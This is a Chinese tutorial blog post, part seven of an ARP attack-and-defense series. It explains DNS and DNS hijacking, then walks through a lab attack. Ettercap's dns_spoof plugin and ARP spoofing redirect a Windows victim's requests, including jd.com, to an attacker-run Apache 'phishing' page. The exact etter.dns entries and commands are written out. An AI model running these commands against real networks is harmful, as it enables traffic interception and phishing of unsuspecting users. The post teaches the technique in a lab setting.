ARP渗透与攻防(七)之Ettercap Dns劫持

系列文章

ARP渗透与攻防(一)之ARP原理
ARP渗透与攻防(二)之断网攻击
ARP渗透与攻防(三)之流量分析
ARP渗透与攻防(四)之WireShark截获用户数据
ARP渗透与攻防(五)之Ettercap劫持用户流量
ARP渗透与攻防(六)之限制网速攻击

ARP-Ettercap Dns劫持

1.什么是DNS

1.概念

DNS是Domain Name System的缩写, 我们称之域名系统。首先它是远程调用服务,本地默认占用53端口,它本身的实质上一个域名和ip的数据库服务器,他要完成的任务是帮我们把输入的域名转换成ip地址,之后通过ip寻址连接目标服务器。

2.工作过程

当访问一个网站时系统将从DNS缓存中读取该域名所对应的IP地址,当查找不到时就会到系统中查找hosts文件,如果还没有那么才会向DNS服务器请求一个DNS查询,DNS服务器将返回该域名所对应的IP,在你的系统收到解析地址以后将使用该IP地址进行访问,同时将解析缓存到本地的DNS缓存中。

在这里插入图片描述

2.什么是DNS劫持

1.概念

DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能访问或访问的是假网址。

2.ettercap劫持的原理

局域网劫持, 攻击者通过伪装成网关, 劫持受害者的网络请求, 将网络请求拦截到指定的服务器

3.DNS常用命令讲解

1.查看DNS缓存表

ipconfig /displaydns

在这里插入图片描述

2.获取DNS地址:

ping maishibing.com

在这里插入图片描述在这里插入图片描述

2.刷新DNS缓存

ipconfig /flushdns

在这里插入图片描述
在这里插入图片描述

3.ARP-DNS欺骗攻击步骤

环境准备

kali 作为ARP攻击机,IP地址:192.168.110.12

win10 作为被攻击方,IP地址:192.168.110.11

网关(路由器),IP地址:192.168.110.1

1.kali开启apache服务
service apache2 start

在这里插入图片描述

2.kali浏览器访问Apache的首页
http://192.168.110.12

在这里插入图片描述确认apache服务已经开启

3.编辑ettercap配置文件
1.进入配置文件位置
cd /etc/ettercap

在这里插入图片描述在这里插入图片描述

2.复制原有的配置文件(环境恢复比较方便)
cp etter.dns etter.dns2

在这里插入图片描述在这里插入图片描述

3.设置dns劫持配置文件
vi /etc/ettercap/etter.dns
添加以下内容
*   A   192.168.110.12
*   PTR 192.168.110.12
wq保存
参数
*:通配符,代表所有的网站都将被解析到192.168.110.12 
也可以换成指定的网站,比如www.jd.com,表示将www.jd.com解析到192.168.110.12
A:常被用于正向地址解析,后面跟上钓鱼的ip地址
PTR :常被用于反向地址解析,后面跟上钓鱼的ip地址

在这里插入图片描述

在这里插入图片描述

5.ettercap劫持命令讲解
 ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /被攻击者ip// /被攻击者网关// 
 -i:网卡
 -T:文本模式
 -q:安静模式
 -M:执行mitm攻击
 -P:plugin 开始该插件
4.靶机访问以下网站确认环境正常
http://www.jd.com/

在这里插入图片描述

6.执行劫持命令
ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /192.168.110.11// /192.168.110.1// >b.txt

在这里插入图片描述

7.分析日志
tail -f b.txt
或者
tail -f b.txt | grep "dns_spoof"

在这里插入图片描述

8.靶机重新访问以下网站查看攻击效果
http://www.jd.com/

在这里插入图片描述

可以看到虽然靶机访问的是jd.com,但打开的却是我们钓鱼的网站,DNS欺骗成功。

9.停止劫持
Ctrl+C
10.恢复dns列表,刷新dns缓存即可。
ipconfig /flushdns

刷新前:
在这里插入图片描述
刷新后:
在这里插入图片描述

11.靶机访问以下网站查看环境是否恢复正常
http://www.jd.com/

在这里插入图片描述
可以看到环境恢复正常了

12.恢复kali环境
1.进入配置文件位置
cd /etc/ettercap
2.复制dns文件到新文件
cp etter.dns etter.dns1
3.还原dns配置文件

将我们之前拷贝的etter.dns2备份文件回复正常

cp etter.dns2 etter.dns
  • 1
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值